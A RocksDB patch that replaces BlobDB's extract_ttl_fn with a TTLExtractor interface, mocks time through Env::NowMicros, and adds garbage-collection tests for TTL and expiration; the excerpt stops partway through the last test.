blob_db::TTLExtractor to replace extract_ttl_fn. The TTL extractor can be use to extract TTL from keys insert with Put or WriteBatch. Change over existing extract_ttl_fn are: * If value is changed, it will be return via std::string* (rather than Slice*). With Slice* the new value has to be part of the existing value. With std::string* the limitation is removed. * It can optionally return TTL or expiration. Other changes in this PR: * replace `std::chrono::system_clock` with `Env::NowMicros` so that I can mock time in tests. * add several TTL tests. * other minor naming change. Closes https://github.com/facebook/rocksdb/pull/2659 Differential Revision: D5512627 Pulled By: yiwu-arbug fbshipit-source-id: 0dfcb00d74d060b8534c6130c808e4d5d0a54440 --- CMakeLists.txt | 1 + TARGETS | 1 + src.mk | 1 + utilities/blob_db/blob_db.cc | 2 - utilities/blob_db/blob_db.h | 23 +-- utilities/blob_db/blob_db_impl.cc | 162 +++++++--------- utilities/blob_db/blob_db_impl.h | 36 +++- utilities/blob_db/blob_db_test.cc | 276 +++++++++++++++++++++++++++- utilities/blob_db/blob_log_format.h | 5 + utilities/blob_db/ttl_extractor.cc | 31 ++++ utilities/blob_db/ttl_extractor.h | 43 +++++ 11 files changed, 460 insertions(+), 121 deletions(-) create mode 100644 utilities/blob_db/ttl_extractor.cc create mode 100644 utilities/blob_db/ttl_extractor.h diff --git a/CMakeLists.txt b/CMakeLists.txt index 1eb98b2265b..2fede71c026 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -482,6 +482,7 @@ set(SOURCES utilities/blob_db/blob_log_reader.cc utilities/blob_db/blob_log_writer.cc utilities/blob_db/blob_log_format.cc + utilities/blob_db/ttl_extractor.cc utilities/cassandra/cassandra_compaction_filter.cc utilities/cassandra/format.cc utilities/cassandra/merge_operator.cc diff --git a/TARGETS b/TARGETS index 4124eec4e99..525e5d38bc0 100644 --- a/TARGETS +++ b/TARGETS @@ -211,6 +211,7 @@ cpp_library( "utilities/blob_db/blob_log_reader.cc", "utilities/blob_db/blob_log_writer.cc", "utilities/blob_db/blob_log_format.cc", + "utilities/blob_db/ttl_extractor.cc", "utilities/cassandra/cassandra_compaction_filter.cc", "utilities/cassandra/format.cc", "utilities/cassandra/merge_operator.cc", diff --git a/src.mk b/src.mk index fb7f979396c..014287ce0a5 100644 --- a/src.mk +++ b/src.mk @@ -159,6 +159,7 @@ LIB_SOURCES = \ utilities/blob_db/blob_log_reader.cc \ utilities/blob_db/blob_log_writer.cc \ utilities/blob_db/blob_log_format.cc \ + utilities/blob_db/ttl_extractor.cc \ utilities/cassandra/cassandra_compaction_filter.cc \ utilities/cassandra/format.cc \ utilities/cassandra/merge_operator.cc \ diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index e2defe97ca0..ea60ad59b47 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -17,7 +17,6 @@ #include "table/block.h" #include "table/block_based_table_builder.h" #include "table/block_builder.h" -#include "util/crc32c.h" #include "util/file_reader_writer.h" #include "util/filename.h" #include "utilities/blob_db/blob_db_impl.h" @@ -163,7 +162,6 @@ BlobDBOptions::BlobDBOptions() bytes_per_sync(0), blob_file_size(256 * 1024 * 1024), num_concurrent_simple_blobs(4), - default_ttl_extractor(false), compression(kNoCompression) {} } // namespace blob_db diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index f45a42f60a9..dfb21383dda 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -13,6 +13,7 @@ #include "rocksdb/db.h" #include "rocksdb/status.h" #include "rocksdb/utilities/stackable_db.h" +#include "utilities/blob_db/ttl_extractor.h" namespace rocksdb { @@ -64,15 +65,10 @@ struct BlobDBOptions { // how many files to use for simple blobs at one time uint32_t num_concurrent_simple_blobs; - // this function is to be provided by client if they intend to - // use Put API to provide TTL. - // the first argument is the value in the Put API - // in case you want to do some modifications to the value, - // return a new Slice in the second. - // otherwise just copy the input value into output. - // the ttl should be extracted and returned in last pointer. - // otherwise assign it to -1 - std::function extract_ttl_fn; + // Instead of setting TTL explicitly by calling PutWithTTL or PutUntil, + // applications can set a TTLExtractor which can extract TTL from key-value + // pairs. + std::shared_ptr ttl_extractor; // eviction callback. // this function will be called for every blob that is getting @@ -80,9 +76,6 @@ struct BlobDBOptions { std::function gc_evict_cb_fn; - // default ttl extactor - bool default_ttl_extractor; - // what compression to use for Blob's CompressionType compression; @@ -95,10 +88,6 @@ struct BlobDBOptions { }; class BlobDB : public StackableDB { - public: - // the suffix to a blob value to represent "ttl:TTLVAL" - static const uint64_t kTTLSuffixLength = 8; - public: using rocksdb::StackableDB::Put; @@ -120,6 +109,8 @@ class BlobDB : public StackableDB { return PutWithTTL(options, DefaultColumnFamily(), key, value, ttl); } + // Put with expiration. Key with expiration time equal to -1 + // means the key don't expire. virtual Status PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value, int32_t expiration) = 0; diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 1dd72b6bc3a..95deda5b0cc 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -6,9 +6,7 @@ #include "utilities/blob_db/blob_db_impl.h" #include -#include #include -#include #include #include #include @@ -58,17 +56,6 @@ namespace rocksdb { namespace blob_db { -struct GCStats { - uint64_t blob_count = 0; - uint64_t num_deletes = 0; - uint64_t deleted_size = 0; - uint64_t num_relocs = 0; - uint64_t succ_deletes_lsm = 0; - uint64_t overrided_while_delete = 0; - uint64_t succ_relocs = 0; - std::shared_ptr newfile = nullptr; -}; - // BlobHandle is a pointer to the blob that is stored in the LSM class BlobHandle { public: @@ -192,7 +179,8 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, const DBOptions& db_options) : BlobDB(nullptr), db_impl_(nullptr), - myenv_(db_options.env), + env_(db_options.env), + ttl_extractor_(blob_db_options.ttl_extractor.get()), wo_set_(false), bdb_options_(blob_db_options), db_options_(db_options), @@ -218,10 +206,6 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, blob_dir_ = (bdb_options_.path_relative) ? dbname + "/" + bdb_options_.blob_dir : bdb_options_.blob_dir; - - if (bdb_options_.default_ttl_extractor) { - bdb_options_.extract_ttl_fn = &BlobDBImpl::ExtractTTLFromBlob; - } } Status BlobDBImpl::LinkToBaseDB(DB* db) { @@ -238,17 +222,17 @@ Status BlobDBImpl::LinkToBaseDB(DB* db) { db_impl_ = dynamic_cast(db); } - myenv_ = db_->GetEnv(); + env_ = db_->GetEnv(); opt_db_.reset(new OptimisticTransactionDBImpl(db, false)); - Status s = myenv_->CreateDirIfMissing(blob_dir_); + Status s = env_->CreateDirIfMissing(blob_dir_); if (!s.ok()) { ROCKS_LOG_WARN(db_options_.info_log, "Failed to create blob directory: %s status: '%s'", blob_dir_.c_str(), s.ToString().c_str()); } - s = myenv_->NewDirectory(blob_dir_, &dir_ent_); + s = env_->NewDirectory(blob_dir_, &dir_ent_); if (!s.ok()) { ROCKS_LOG_WARN(db_options_.info_log, "Failed to open blob directory: %s status: '%s'", @@ -293,10 +277,6 @@ BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) blob_dir_ = (bdb_options_.path_relative) ? db_->GetName() + "/" + bdb_options_.blob_dir : bdb_options_.blob_dir; - - if (bdb_options_.default_ttl_extractor) { - bdb_options_.extract_ttl_fn = &BlobDBImpl::ExtractTTLFromBlob; - } } BlobDBImpl::~BlobDBImpl() { @@ -311,7 +291,7 @@ Status BlobDBImpl::OpenPhase1() { return Status::NotSupported("No blob directory in options"); std::unique_ptr dir_ent; - Status s = myenv_->NewDirectory(blob_dir_, &dir_ent); + Status s = env_->NewDirectory(blob_dir_, &dir_ent); if (!s.ok()) { ROCKS_LOG_WARN(db_options_.info_log, "Failed to open blob directory: %s status: '%s'", @@ -366,7 +346,7 @@ void BlobDBImpl::OnFlushBeginHandler(DB* db, const FlushJobInfo& info) { Status BlobDBImpl::GetAllLogFiles( std::set>* file_nums) { std::vector all_files; - Status status = myenv_->GetChildren(blob_dir_, &all_files); + Status status = env_->GetChildren(blob_dir_, &all_files); if (!status.ok()) { return status; } @@ -413,7 +393,7 @@ Status BlobDBImpl::OpenAllFiles() { for (auto f_iter : file_nums) { std::string bfpath = BlobFileName(blob_dir_, f_iter.first); uint64_t size_bytes; - Status s1 = myenv_->GetFileSize(bfpath, &size_bytes); + Status s1 = env_->GetFileSize(bfpath, &size_bytes); if (!s1.ok()) { ROCKS_LOG_WARN( db_options_.info_log, @@ -436,7 +416,7 @@ Status BlobDBImpl::OpenAllFiles() { // read header std::shared_ptr reader; - reader = bfptr->OpenSequentialReader(myenv_, db_options_, env_options_); + reader = bfptr->OpenSequentialReader(env_, db_options_, env_options_); s1 = reader->ReadHeader(&bfptr->header_); if (!s1.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, @@ -448,7 +428,7 @@ Status BlobDBImpl::OpenAllFiles() { bfptr->header_valid_ = true; std::shared_ptr ra_reader = - GetOrOpenRandomAccessReader(bfptr, myenv_, env_options_); + GetOrOpenRandomAccessReader(bfptr, env_, env_options_); BlobLogFooter bf; s1 = bfptr->ReadFooter(&bf); @@ -586,13 +566,13 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { EnvOptions env_options = env_options_; env_options.writable_file_max_buffer_size = 0; - Status s = myenv_->ReopenWritableFile(fpath, &wfile, env_options); + Status s = env_->ReopenWritableFile(fpath, &wfile, env_options); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, "Failed to open blob file for write: %s status: '%s'" " exists: '%s'", fpath.c_str(), s.ToString().c_str(), - myenv_->FileExists(fpath).ToString().c_str()); + env_->FileExists(fpath).ToString().c_str()); return s; } @@ -788,39 +768,13 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint32_t expiration) { return bfile; } -bool BlobDBImpl::ExtractTTLFromBlob(const Slice& value, Slice* newval, - int32_t* ttl_val) { - *newval = value; - *ttl_val = -1; - if (value.size() <= BlobDB::kTTLSuffixLength) return false; - - int32_t ttl_tmp = - DecodeFixed32(value.data() + value.size() - sizeof(int32_t)); - std::string ttl_exp(value.data() + value.size() - BlobDB::kTTLSuffixLength, - 4); - if (ttl_exp != "ttl:") return false; - - newval->remove_suffix(BlobDB::kTTLSuffixLength); - *ttl_val = ttl_tmp; - return true; -} - -//////////////////////////////////////////////////////////////////////////////// -// A specific pattern is looked up at the end of the value part. -// ttl:TTLVAL . if this pattern is found, PutWithTTL is called, otherwise -// regular Put is called. -//////////////////////////////////////////////////////////////////////////////// Status BlobDBImpl::Put(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value) { - Slice newval; - int32_t ttl_val; - if (bdb_options_.extract_ttl_fn) { - bdb_options_.extract_ttl_fn(value, &newval, &ttl_val); - return PutWithTTL(options, column_family, key, newval, ttl_val); - } - - return PutWithTTL(options, column_family, key, value, -1); + std::string new_value; + Slice value_slice; + int32_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); + return PutUntil(options, column_family, key, value_slice, expiration); } Status BlobDBImpl::Delete(const WriteOptions& options, @@ -852,6 +806,7 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { Status batch_rewrite_status_; std::shared_ptr last_file_; bool has_put_; + std::string new_value_; public: explicit BlobInserter(BlobDBImpl* impl, SequenceNumber seq) @@ -866,23 +821,13 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { bool has_put() { return has_put_; } virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& value_unc) override { - Slice newval; - int32_t ttl_val = -1; - if (impl_->bdb_options_.extract_ttl_fn) { - impl_->bdb_options_.extract_ttl_fn(value_unc, &newval, &ttl_val); - } else { - newval = value_unc; - } + const Slice& value_slice) override { + Slice value_unc; + int32_t expiration = + impl_->ExtractExpiration(key, value_slice, &value_unc, &new_value_); - int32_t expiration = -1; - if (ttl_val != -1) { - std::time_t cur_t = std::chrono::system_clock::to_time_t( - std::chrono::system_clock::now()); - expiration = ttl_val + static_cast(cur_t); - } std::shared_ptr bfile = - (ttl_val != -1) + (expiration != -1) ? impl_->SelectBlobFileTTL(expiration) : ((last_file_) ? last_file_ : impl_->SelectBlobFile()); if (last_file_ && last_file_ != bfile) { @@ -1004,12 +949,8 @@ Status BlobDBImpl::PutWithTTL(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value, int32_t ttl) { - return PutUntil( - options, column_family, key, value, - (ttl != -1) - ? ttl + static_cast(std::chrono::system_clock::to_time_t( - std::chrono::system_clock::now())) - : -1); + return PutUntil(options, column_family, key, value, + static_cast(EpochNow()) + ttl); } Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, @@ -1024,6 +965,7 @@ Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, return *compression_output; } +// TODO(yiwu): We should use uint64_t for expiration. Status BlobDBImpl::PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value_unc, int32_t expiration) { @@ -1097,6 +1039,24 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, return s; } +// TODO(yiwu): We should return uint64_t after updating the rest of the code +// to use uint64_t for expiration. +int32_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, + Slice* value_slice, + std::string* new_value) { + uint64_t expiration = kNoExpiration; + bool value_changed = false; + if (ttl_extractor_ != nullptr) { + bool has_ttl = ttl_extractor_->ExtractExpiration( + key, value, EpochNow(), &expiration, new_value, &value_changed); + if (!has_ttl) { + expiration = kNoExpiration; + } + } + *value_slice = value_changed ? Slice(*new_value) : value; + return (expiration == kNoExpiration) ? -1 : static_cast(expiration); +} + Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, const Slice& value, std::string* index_entry) { @@ -1240,7 +1200,7 @@ Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, // takes locks when called std::shared_ptr reader = - GetOrOpenRandomAccessReader(bfile, myenv_, env_options_); + GetOrOpenRandomAccessReader(bfile, env_, env_options_); if (value != nullptr) { std::string* valueptr = value; @@ -1377,14 +1337,13 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) { assert(!bfile->Immutable()); } - std::time_t epoch_now = - std::chrono::system_clock::to_time_t(std::chrono::system_clock::now()); + uint64_t epoch_now = EpochNow(); for (auto bfile_pair : blob_files_) { auto bfile = bfile_pair.second; ROCKS_LOG_INFO( db_options_.info_log, - "Blob File %s %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64 " %d", + "Blob File %s %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64, bfile->PathName().c_str(), bfile->GetFileSize(), bfile->BlobCount(), bfile->deleted_count_, bfile->deleted_size_, (bfile->ttl_range_.second - epoch_now)); @@ -1603,8 +1562,7 @@ std::pair BlobDBImpl::CheckSeqFiles(bool aborted) { std::vector> process_files; { - std::time_t epoch_now = - std::chrono::system_clock::to_time_t(std::chrono::system_clock::now()); + uint64_t epoch_now = EpochNow(); ReadLock rl(&mutex_); for (auto bfile : open_blob_files_) { @@ -1713,11 +1671,10 @@ std::pair BlobDBImpl::WaStats(bool aborted) { //////////////////////////////////////////////////////////////////////////////// Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, GCStats* gcstats) { - std::chrono::system_clock::time_point now = std::chrono::system_clock::now(); - std::time_t tt = std::chrono::system_clock::to_time_t(now); + uint64_t tt = EpochNow(); std::shared_ptr reader = - bfptr->OpenSequentialReader(myenv_, db_options_, env_options_); + bfptr->OpenSequentialReader(env_, db_options_, env_options_); if (!reader) { ROCKS_LOG_ERROR(db_options_.info_log, "File sequential reader could not be opened", @@ -1987,7 +1944,7 @@ std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { } } - Status s = myenv_->DeleteFile(bfile->PathName()); + Status s = env_->DeleteFile(bfile->PathName()); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, "File failed to be deleted as obsolete %s", @@ -2019,7 +1976,7 @@ std::pair BlobDBImpl::DeleteObsFiles(bool aborted) { bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr bfile) { std::shared_ptr reader = - bfile->OpenSequentialReader(myenv_, db_options_, env_options_); + bfile->OpenSequentialReader(env_, db_options_, env_options_); if (!reader) { ROCKS_LOG_ERROR( db_options_.info_log, @@ -2264,6 +2221,23 @@ Status BlobDBImpl::TEST_GetSequenceNumber(const Slice& key, auto cfh = reinterpret_cast(DefaultColumnFamily()); return CommonGet(cfh->cfd(), key, index_entry, nullptr, sequence); } + +std::vector> BlobDBImpl::TEST_GetBlobFiles() const { + std::vector> blob_files; + for (auto& p : blob_files_) { + blob_files.emplace_back(p.second); + } + return blob_files; +} + +void BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr& bfile) { + CloseSeqWrite(bfile, false /*abort*/); +} + +Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, + GCStats* gc_stats) { + return GCFileAndUpdateLSM(bfile, gc_stats); +} #endif // !NDEBUG } // namespace blob_db diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index a5c5822bb76..8da5bbf6529 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -10,6 +10,7 @@ #include #include #include +#include #include #include #include @@ -45,7 +46,6 @@ namespace blob_db { class BlobFile; class BlobDBImpl; -struct GCStats; class BlobDBFlushBeginListener : public EventListener { public: @@ -134,6 +134,17 @@ struct blobf_compare_ttl { const std::shared_ptr& rhs) const; }; +struct GCStats { + uint64_t blob_count = 0; + uint64_t num_deletes = 0; + uint64_t deleted_size = 0; + uint64_t num_relocs = 0; + uint64_t succ_deletes_lsm = 0; + uint64_t overrided_while_delete = 0; + uint64_t succ_relocs = 0; + std::shared_ptr newfile = nullptr; +}; + /** * The implementation class for BlobDB. This manages the value * part in TTL aware sequentially written files. These files are @@ -147,6 +158,9 @@ class BlobDBImpl : public BlobDB { friend class BlobDBIterator; public: + static constexpr uint64_t kNoExpiration = + std::numeric_limits::max(); + using rocksdb::StackableDB::Put; Status Put(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value) override; @@ -200,12 +214,16 @@ class BlobDBImpl : public BlobDB { #ifndef NDEBUG Status TEST_GetSequenceNumber(const Slice& key, SequenceNumber* sequence); + + std::vector> TEST_GetBlobFiles() const; + + void TEST_CloseBlobFile(std::shared_ptr& bfile); + + Status TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, + GCStats* gc_stats); #endif // !NDEBUG private: - static bool ExtractTTLFromBlob(const Slice& value, Slice* newval, - int32_t* ttl_val); - Status OpenPhase1(); Status CommonGet(const ColumnFamilyData* cfd, const Slice& key, @@ -237,6 +255,9 @@ class BlobDBImpl : public BlobDB { // appends a task into timer queue to close the file void CloseIf(const std::shared_ptr& bfile); + int32_t ExtractExpiration(const Slice& key, const Slice& value, + Slice* value_slice, std::string* new_value); + Status AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, const Slice& value, std::string* index_entry); @@ -346,11 +367,12 @@ class BlobDBImpl : public BlobDB { std::vector>* to_process, uint64_t epoch, uint64_t last_id, size_t files_to_collect); - private: + uint64_t EpochNow() { return env_->NowMicros() / 1000000; } + // the base DB DBImpl* db_impl_; - - Env* myenv_; + Env* env_; + TTLExtractor* ttl_extractor_; // Optimistic Transaction DB used during Garbage collection // for atomicity diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 13ad7a2fa09..6a43f6b77e9 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -25,7 +25,22 @@ class BlobDBTest : public testing::Test { public: const int kMaxBlobSize = 1 << 14; - BlobDBTest() : dbname_(test::TmpDir() + "/blob_db_test"), blob_db_(nullptr) { + class MockEnv : public EnvWrapper { + public: + MockEnv() : EnvWrapper(Env::Default()) {} + + void set_now_micros(uint64_t now_micros) { now_micros_ = now_micros; } + + uint64_t NowMicros() override { return now_micros_; } + + private: + uint64_t now_micros_ = 0; + }; + + BlobDBTest() + : dbname_(test::TmpDir() + "/blob_db_test"), + mock_env_(new MockEnv()), + blob_db_(nullptr) { Status s = DestroyBlobDB(dbname_, Options(), BlobDBOptions()); assert(s.ok()); } @@ -59,9 +74,25 @@ class BlobDBTest : public testing::Test { } } + void PutRandomUntil(const std::string &key, int32_t expiration, Random *rnd, + std::map *data = nullptr) { + int len = rnd->Next() % kMaxBlobSize + 1; + std::string value = test::RandomHumanReadableString(rnd, len); + ASSERT_OK(blob_db_->PutUntil(WriteOptions(), Slice(key), Slice(value), + expiration)); + if (data != nullptr) { + (*data)[key] = value; + } + } + void PutRandom(const std::string &key, Random *rnd, std::map *data = nullptr) { - PutRandomWithTTL(key, -1, rnd, data); + int len = rnd->Next() % kMaxBlobSize + 1; + std::string value = test::RandomHumanReadableString(rnd, len); + ASSERT_OK(blob_db_->Put(WriteOptions(), Slice(key), Slice(value))); + if (data != nullptr) { + (*data)[key] = value; + } } void PutRandomToWriteBatch( @@ -115,6 +146,8 @@ class BlobDBTest : public testing::Test { } const std::string dbname_; + std::unique_ptr mock_env_; + std::shared_ptr ttl_extractor_; BlobDB *blob_db_; }; // class BlobDBTest @@ -130,6 +163,245 @@ TEST_F(BlobDBTest, Put) { VerifyDB(data); } +TEST_F(BlobDBTest, PutWithTTL) { + Random rnd(301); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + std::map data; + mock_env_->set_now_micros(50 * 1000000); + for (size_t i = 0; i < 100; i++) { + int32_t ttl = rnd.Next() % 100; + PutRandomWithTTL("key" + ToString(i), ttl, &rnd, + (ttl < 50 ? nullptr : &data)); + } + mock_env_->set_now_micros(100 * 1000000); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); + ASSERT_EQ(data.size(), gc_stats.num_relocs); + VerifyDB(data); +} + +TEST_F(BlobDBTest, PutUntil) { + Random rnd(301); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + std::map data; + mock_env_->set_now_micros(50 * 1000000); + for (size_t i = 0; i < 100; i++) { + int32_t expiration = rnd.Next() % 100 + 50; + PutRandomUntil("key" + ToString(i), expiration, &rnd, + (expiration < 100 ? nullptr : &data)); + } + mock_env_->set_now_micros(100 * 1000000); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); + ASSERT_EQ(data.size(), gc_stats.num_relocs); + VerifyDB(data); +} + +TEST_F(BlobDBTest, TTLExtrator_NoTTL) { + // The default ttl extractor return no ttl for every key. + ttl_extractor_.reset(new TTLExtractor()); + Random rnd(301); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.num_concurrent_simple_blobs = 1; + bdb_options.ttl_extractor = ttl_extractor_; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + std::map data; + mock_env_->set_now_micros(0); + for (size_t i = 0; i < 100; i++) { + PutRandom("key" + ToString(i), &rnd, &data); + } + // very far in the future.. + mock_env_->set_now_micros(std::numeric_limits::max() - 10); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_FALSE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(0, gc_stats.num_deletes); + ASSERT_EQ(100, gc_stats.num_relocs); + VerifyDB(data); +} + +TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { + Random rnd(301); + class TestTTLExtractor : public TTLExtractor { + public: + explicit TestTTLExtractor(Random *r) : rnd(r) {} + + virtual bool ExtractTTL(const Slice &key, const Slice &value, uint64_t *ttl, + std::string * /*new_value*/, + bool * /*value_changed*/) override { + *ttl = rnd->Next() % 100; + if (*ttl >= 50) { + data[key.ToString()] = value.ToString(); + } + return true; + } + + Random *rnd; + std::map data; + }; + ttl_extractor_.reset(new TestTTLExtractor(&rnd)); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.ttl_extractor = ttl_extractor_; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + mock_env_->set_now_micros(50 * 1000000); + for (size_t i = 0; i < 100; i++) { + PutRandom("key" + ToString(i), &rnd); + } + mock_env_->set_now_micros(100 * 1000000); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + auto &data = static_cast(ttl_extractor_.get())->data; + ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); + ASSERT_EQ(data.size(), gc_stats.num_relocs); + VerifyDB(data); +} + +TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { + Random rnd(301); + class TestTTLExtractor : public TTLExtractor { + public: + explicit TestTTLExtractor(Random *r) : rnd(r) {} + + virtual bool ExtractExpiration(const Slice &key, const Slice &value, + uint64_t /*now*/, uint64_t *expiration, + std::string * /*new_value*/, + bool * /*value_changed*/) override { + *expiration = rnd->Next() % 100 + 50; + if (*expiration >= 100) { + data[key.ToString()] = value.ToString(); + } + return true; + } + + Random *rnd; + std::map data; + }; + ttl_extractor_.reset(new TestTTLExtractor(&rnd)); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.ttl_extractor = ttl_extractor_; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + mock_env_->set_now_micros(50 * 1000000); + for (size_t i = 0; i < 100; i++) { + PutRandom("key" + ToString(i), &rnd); + } + mock_env_->set_now_micros(100 * 1000000); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + auto &data = static_cast(ttl_extractor_.get())->data; + ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); + ASSERT_EQ(data.size(), gc_stats.num_relocs); + VerifyDB(data); +} + +TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { + class TestTTLExtractor : public TTLExtractor { + public: + const Slice kTTLSuffix = Slice("ttl:"); + + bool ExtractTTL(const Slice & /*key*/, const Slice &value, uint64_t *ttl, + std::string *new_value, bool *value_changed) override { + if (value.size() < 12) { + return false; + } + const char *p = value.data() + value.size() - 12; + if (kTTLSuffix != Slice(p, 4)) { + return false; + } + *ttl = DecodeFixed64(p + 4); + *new_value = Slice(value.data(), value.size() - 12).ToString(); + *value_changed = true; + return true; + } + }; + Random rnd(301); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.ttl_extractor = std::make_shared(); + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + std::map data; + mock_env_->set_now_micros(50 * 1000000); + for (size_t i = 0; i < 100; i++) { + int len = rnd.Next() % kMaxBlobSize + 1; + std::string key = "key" + ToString(i); + std::string value = test::RandomHumanReadableString(&rnd, len); + uint64_t ttl = rnd.Next() % 100; + std::string value_ttl = value + "ttl:"; + PutFixed64(&value_ttl, ttl); + ASSERT_OK(blob_db_->Put(WriteOptions(), Slice(key), Slice(value_ttl))); + if (ttl >= 50) { + data[key] = value; + } + } + mock_env_->set_now_micros(100 * 1000000); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + 